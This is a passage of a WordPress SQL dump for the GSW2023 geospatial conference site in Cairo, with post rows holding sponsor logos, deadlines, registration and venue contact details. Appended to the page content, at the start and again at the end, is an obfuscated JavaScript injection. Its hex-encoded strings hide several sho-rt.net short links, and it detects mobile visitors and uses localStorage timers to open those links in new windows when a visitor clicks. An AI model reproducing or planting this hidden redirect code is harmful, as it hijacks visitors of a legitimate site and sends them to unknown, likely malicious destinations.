Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-04-06 22:38:52','2023-04-06 22:38:52','',2679,'https://gsw2023.com/?p=4039',0,'revision','',0),
(4041,1,'2023-04-13 17:01:36','2023-04-13 17:01:36','','Geosat logo','','inherit','open','closed','','geosat-logo','','','2023-04-13 17:01:36','2023-04-13 17:01:36','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4042,1,'2023-04-13 17:24:09','2023-04-13 17:24:09','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406640657{margin-top: 135px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406007049{margin-top: px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 